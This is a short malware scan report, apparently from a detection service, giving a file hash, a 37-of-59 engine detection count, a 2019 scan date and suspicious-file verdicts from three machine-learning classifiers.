version: 10.0.0.1040
detected: True check_circle

total
59
sha256
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a
scan_id
2d3ebed2054f91563736a938d884a9bf6b144fd157602a65119120785c93c13a-1547862914
resource
7b14c57918df578a14c300c788644701
positives
37
scan_date
2019-01-19 01:55:14
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle